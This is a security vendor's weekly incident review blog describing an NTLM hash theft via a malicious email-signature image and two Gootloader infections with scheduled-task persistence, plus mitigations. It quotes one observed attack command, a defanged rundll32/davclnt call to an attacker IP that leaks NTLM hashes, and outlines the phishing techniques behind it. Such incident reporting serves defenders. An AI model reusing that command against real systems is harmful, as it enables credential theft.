NTLM Credential Theft and Gootloader

The Blackpoint Active SOC’s Week in Review for May 17, 2024

Between May 08-15, 2024, Blackpoint’s Security Operations Center (SOC) responded to 102 total incidents. These incidents included 24 on-premises MDR incidents, 2 Cloud Response for Google Workspace, and 76 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:

In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.

Return to Top

NTLM Credential Theft Incident with Institutions & Organizations Partner on May 10, 2024

Topline Takeaways

  • Industry target: Institutions & Organizations
  • Attack information:
    • rundll32.exe
    • netstat
    • NTLM credential theft
  • Antivirus (AV) and / or EDR present in environment? Yes-EDR
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use NTLM credential theft to exploit other Institutions & Organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Employee security training
    • Multifactor authentication (MFA)
    • Risk-based patch management programs
    • Create and enforce an organizational password policy

NTLM Credential Theft Incident Timeline for May 10, 2024

  • A threat actor gained initial access to an Institution & Organization partner when a user received an email with the subject line “[Team] input for May 15 [Organization] meeting”. The user was presented an Outlook notification, which stated a connection to the server was being established.
    • Post-incident analysis discovered that a malicious PNG file in the email signature of a third party targeted the user’s NTLM hash.
  • The Blackpoint MDR+R Technology triggered a potential NTLM credential theft alert to Active SOC analysts on an Institutions & Organizations partner’s host.
  • During their initial investigation, Active SOC analysts observed rundll32 calling out to a URL “file[://]64.23.155[.]46/default_logo[.]png”, which gave a login prompt to users after navigating to the site.
    • The IP address in question was previously linked to malicious remote access and file sharing.
  • Active SOC analysts proactively isolated the Institutions & Organizations user’s device to prevent further malicious activity, with the Active SOC team reaching out to the partner with incident information and additional remediation advice.
  • Post-incident analysis by the APG’s Threat Research team identified the following command line arguments on the infected host:

rundll32[.]exe C:\Windows\system32\davclnt[.]dll,DavSetCookie 64[.]23[.]155[.]46
http://64[.]23[.]155[.]46/default_logo[.]png

    • These arguments could indicate attempted exploit of CVE-2023-35636 (1): a Microsoft Outlook / Windows Performance Analyzer (WPA) / Windows File Explorer vulnerability that allows a threat actor to exfiltrate NTLM v2 hashes from a host machine to an attacker-controlled server.
    • Additional incident indicators were consistent with search-ms protocol abuse.

More About NTLM Credential Theft

Click for details

NTLM is a cryptographic protocol used by Microsoft Windows to authenticate users to remote servers, which involves securely transporting passwords as hashes (2).

Due to no salting occurring, threat actors can grab the hashes and used them to authenticate accounts and activity without actually knowing the password.

NTLM credential theft allows threat actors to elevate privileges, hijack additional accounts, access sensitive information, evade detection, and move laterally through a victim network (3).

APG Threat Analysis of NTLM Credential Theft for 2024

Click for details

The APG predicts that threat actors will likely continue to use NTLM credential theft over the next 12 months.

We base this assessment on the versatility of the tactic for threat actors, in addition to observed attempted use throughout Blackpoint managed environments and external researchers’ observations.

Security researchers with Proofpoint reported that TA577 – an initial access broker that has previously worked with Qakbot and Black Basta operations – used phishing emails to steal NTLM authentication hashes to hijack accounts (3).

The group reportedly sent thousands of messages to hundreds of organizations worldwide and appeared to be replies to previous discussions. The emails included a unique ZIP archive attachment containing HTML files that used META refresh HTML tags to trigger an automatic connection to a text file on an external SMB server.

The URLs observed did not deliver any malware payloads, indicating that the primary goal was to collect credentials.

Recommended NTLM Credential Theft Mitigations and Remediations

Click for details

Blackpoint’s APG recommends the following actions to help mitigate NTLM credential theft and social engineering tactics.

  • Conduct employee security awareness training, including how to spot a phishing email such as the one used in this incident, and how and when to report them to an incident response authority.
  • Ensure employees are using MFA and VPNs to access sensitive data and resources, which will provide an additional level of credential authentication beyond relying on default protocols that may not have full encryption resources.
  • Implement a risk-based patch management program to ensure that relevant and exploited security vulnerabilities are patched in a timely manner in critical services, such as Microsoft products, to prevent exploitation of low-criticality-but-still-relevant CVEs such as CVE-2023-35636 (Vendor CVSS Score 6.5).
  • Create and enforce a strong password policy that includes a requirement for passwords to be complex and unique, which can help reduce the risk of NTLM hash cracking and increase the security of user accounts.

Return to Top

Gootloader and “Loans Administration” Scheduled Task Incident with Government Partner on May 10, 2024

Topline Takeaways

  • Industry target: Government
  • Attacker information:
    • Gootloader malware
    • is comp time legal in pennsylvania 68771.js
    • Scheduled task “Loans Administration”
  • Antivirus (AV) and / or EDR present in environment? Yes-EDR
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use Gootloader to exploit other Government organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Use a content proxy
    • Scripting language controls
    • Improve endpoint, asset, and overall environment visibility
    • Heuristics-based activity monitoring and remediation

Gootloader and “Loans Administration” Scheduled Task Incident Timeline for May 10, 2024

  • Blackpoint’s MDR+R alerted the Active SOC team to a process violation on a Government partner’s host.
  • Additional analysis by Active SOC analysts revealed that the host was likely infected with the Gootloader malware. The threat actor created a scheduled task, “Loans Administration” – likely for persistence – and used wscript for additional runs.
  • The Active SOC team isolated the infected host and disabled the scheduled task after confirmed indicators of Gootloader, before contacting the Government partner about the incident and with additional remediation advice.

More About Gootloader Malware

Click for details

Gootloader malware is a first stage downloader designed to target Windows-based operating systems (OS) and has been actively used by multiple threat groups since at least 2020. Cybercriminal enterprises offerGootloader as an Initial-Access-as-a-Service (IAaaS) tool (4).

The APG and other security researchers have observed Gootloader acting as a downloader for multiple malware families, including:

  • Ransomware, such as REvil;
  • Remote access tools, such as Cobalt Strike and SystemBC; and
  • Stealer malware.

Gootloader has frequently been observed using scheduled tasks to gain persistence on a victim environment, using PowerShell commands to create tasks set to run periodically.

Gootloader gains initial access to victim environments using multiple methods, including:

  • Exploiting WordPress vulnerabilities;
  • Malicious JavaScript files that impersonate legitimate documents;
  • Social engineering attacks with malicious attachments; and
  • Search engine optimization (SEO) poisoning, where victims are convinced to drive-by download items that deliver the first stage payload.

APG Threat Analysis of Gootloader Malware for 2024

Click for details

The APG predicts that threat actors will likely continue to use Gootloader malware over the next 12 months.

We base this assessment on both internal Blackpoint attack trends, as well as external reports of recent Gootloader malware attacks:

  • In February 2024, a DFIR report was released detailing an incident involving the deployment of the Gootloader malware. The threat actors used SEO poisoning to deploy the Gootloader malware, which led to the deployment of a Cobalt Strike beacon and SystemBC. The group exploited the terms “Implied Employment Agreement”, which is in line with the threat actors’ historic use of terms related to contracts and agreements during incidents (5).
  • In May 2024, security researchers with Field Effect released a report detailing multiple incidents involving the Gootloader malware deployed to victims in multiple verticals. The threat actors in these incidents used SEO poisoning involving searches related to contracts and agreements to initially install Gootloader malware. Gootloader then used wscript to execute malicious scripts and create a scheduled task for persistence (6).

Recommended Gootloader Malware Mitigations and Remediations

Click for details

Blackpoint’s APG recommends the following actions to help mitigate Gootloader malware infections and persistence actions:

  • Consider the use of a content proxy to monitor internet usage and restrict user access to suspicious or potentially risky websites, including potential SEO poisoning traps.
  • Minimize the use of – or implement strict controls on – the use of scripting languages, as threat actors often rely on scripting languages to deploy malware and conduct malicious activities. (For example, the threat actor in this incident abused scripting languages to create and run the persistence scheduled task “Loans Administration”.)
  • Improve security visibility of networks, endpoints, and other managed assets to aid in detecting and alerting to malicious actions conducted by Gootloader and other malware.
  • Monitor system activity through heuristics-based triggers and alerts, rather than depending solely on indicators of compromise (IoCs) to detect unusual access patterns that could be indicative of malicious behavior by threat actors. Scheduled tasks is an allowlisted function on most managed endpoints, but it’s the activity itself that will always be a red flag of malicious actors within your environments.

Return to Top

Gootloader and “Global Trade Management” Incident with Energy Partner on May 10, 2024

Topline Takeaways

  • Industry target: Energy
  • Attacker information:
    • Gootloader malware
    • Scheduled task “Global Trade Management”
    • wscript
  • Antivirus (AV) and / or EDR present in environment? No
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use Gootloader to exploit other Energy organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Use a content proxy
    • Scripting language controls
    • Improve endpoint, asset, and overall environment visibility
    • Heuristics-based activity monitoring and remediation

Gootloader and “Global Trade Management” Scheduled Task Incident Timeline for May 10, 2024

  • Blackpoint’s MDR+R alerted the Active SOC team to a process violation on a Energy partner’s host.
  • Additional analysis by Active SOC analysts revealed that the host was likely infected with the Gootloader malware. The threat actor created a scheduled task, “Global Trade Management” – likely for persistence – and used wscript for additional runs.
  • The Active SOC team isolated the infected host and disabled the scheduled task after confirmed indicators of Gootloader, before contacting the Energy partner about the incident and with additional remediation advice.

Return to Top

References and Resources

A quick note on incident details:

As these analyses concern recent incidents in actively monitored environment, certain details may be occasionally omitted and / or obfuscated, to better secure our partners and protect any still-ongoing investigations.

However, we felt that these incidents were important enough to bring to the community’s attention as fast as possible, and so included them in this public writeup.

Please feel free to reach out to the APG directly if you have any questions about a specific incident!

Click for full reference list
  1. Varonis’s Blog: “Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes” by Taler and Dolev on 2024, February 02
  2. Proofpoint’s Blog: “TA577’s Unusual Attack Chain Leads to NTLM Data Theft” by Tommy Madjar et. al. on 2024-03-04
  3. Blackpoint Cyber’s Blog: “How Internet Access Brokers Fuel Cybercrime and What You Can Do About It” by Blackpoint Cyber on 2024-03-06
  4. Field Effect’s Blog: “Sample templates abused in recent Gootloader campaign” by Ryan Slaney on 2024-05-02
  5. DFIR’s Blog: “SEO Poisoning to Domain Control: The Gootloader Saga Continues” by DFIR on 2024-02-06
DATE PUBLISHEDMay 17, 2024
AUTHORBlackpoint Cyber

Subscribe to the Blackpoint Blog

Don’t let a lack of awareness leave the organizations you protect vulnerable to sophisticated and elusive attacks. Subscribe now for a weekly roundup of Blackpoint’s empowering articles.

Subscribe now!